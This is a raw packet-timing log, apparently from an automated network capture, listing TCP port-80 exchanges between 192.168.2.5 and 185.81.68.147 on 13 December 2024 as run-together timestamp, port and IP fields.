                                                                                                                                                                Dec 13, 2024 01:37:20.773679018 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.773722887 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.780838966 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.780927896 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.780966043 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.816643000 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.864088058 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.889003992 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.889076948 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.889134884 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.891249895 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.891372919 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.891427994 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.895900011 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.897607088 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.897661924 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.897674084 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.902256012 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.902309895 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.902378082 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.906894922 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.906950951 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.907001972 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.911565065 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.911669016 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.911731958 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.915992975 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.916049957 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.916172028 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.920392036 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.920449018 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.920504093 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.924808025 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.924863100 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.924943924 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.929270029 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.929333925 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.929380894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.933679104 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.933738947 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.933824062 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.938112974 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.938163996 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.938169956 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.942543030 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.942604065 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.942643881 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.946970940 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.947031021 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.947073936 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.951404095 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.951462984 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.951525927 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.955830097 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.955887079 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.955950022 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.960263014 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.960331917 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.960387945 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.964725018 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.964817047 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.964879990 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.969168901 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.969227076 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.969253063 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.973546982 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.973598957 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.973675013 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.977981091 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.978038073 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.978104115 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.982449055 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.982522011 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:20.982548952 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.986820936 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:20.987044096 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.080979109 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.081017971 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.081118107 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.082691908 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.082811117 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.082874060 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.086297989 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.086421013 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.086491108 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.089945078 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.089997053 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.090091944 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.093626022 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.093770027 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.093825102 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.096875906 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.096957922 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.097017050 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.100250959 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.100450993 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.100511074 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.103529930 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.103610039 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.103667021 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.106803894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.106926918 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.106986046 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.110009909 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.110100985 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.110155106 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.113152981 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.113253117 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.113300085 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.116213083 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.116249084 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.116291046 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.119282007 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.119389057 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.119441032 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.122354031 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.122394085 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.122453928 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.125462055 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.125550032 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.125643015 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.128474951 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.128561974 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.128631115 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.131561995 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.131678104 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.131732941 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.134615898 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.134716034 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.134769917 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.137689114 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.137782097 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.137835979 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.140753031 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.140849113 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.140937090 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.143851042 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.143961906 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.144037962 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.146955013 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.147053957 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.147274971 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.150016069 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.150068045 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.150151968 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.153064966 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.153175116 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.153299093 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.156155109 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.156250000 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.156303883 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.159290075 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.159343004 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.159415007 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.162389040 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.162465096 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.162529945 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.165355921 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.165435076 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.165488005 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.168407917 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.168504000 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.168560028 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.171526909 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.171544075 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.171598911 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.174530983 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.174632072 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.174701929 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.177639008 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.177700996 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.177769899 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.180701017 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.180788994 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.180861950 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.183736086 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.183861017 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.183928967 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.186816931 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.186894894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.186965942 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.272937059 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.272977114 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.273022890 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.274061918 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.274133921 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.274172068 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.276038885 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.276124001 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.276165962 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.278485060 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.278584003 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.278623104 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.281021118 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.281111002 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.281147003 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.283396006 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.283485889 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.283534050 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.285753012 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.285841942 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.285888910 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.288090944 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.288158894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.288283110 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.290352106 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.290437937 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.290478945 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.292617083 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.292716980 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.292766094 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.294795036 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.294858932 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.294981956 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.296998024 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.297080040 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.297148943 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.299146891 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.299232960 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.299278021 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.301285982 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.301379919 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.301500082 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.303400040 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.303528070 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.303574085 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.305500031 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.305592060 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.305630922 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.307532072 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.307620049 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.307679892 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.309597015 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.309674025 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.310009003 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.311615944 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.311669111 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.311753988 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.313643932 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.313707113 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.313769102 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.315613985 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.315710068 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.315758944 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.317610025 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.317709923 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.317753077 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.319622993 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.319700956 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.319763899 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.321625948 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.321703911 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.323616028 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.323682070 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.323710918 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.323749065 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.325597048 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.325691938 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.325746059 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.327606916 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.327704906 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.327764034 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.329601049 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.329688072 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.329745054 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.331609011 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.331697941 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.331800938 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.333620071 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.333694935 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.333733082 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.335607052 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.335705996 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.335753918 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.337604046 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.337703943 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.337740898 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.339585066 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.339709997 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.339759111 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.341593027 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.341768026 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.341857910 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.343637943 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.343718052 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.343753099 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.345585108 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.345696926 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.345774889 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.347595930 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.347700119 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.347970009 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.349608898 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.349770069 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.349817991 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.351641893 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.351727009 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.351891994 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.353606939 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.353708982 CET8049719185.81.68.147192.168.2.5
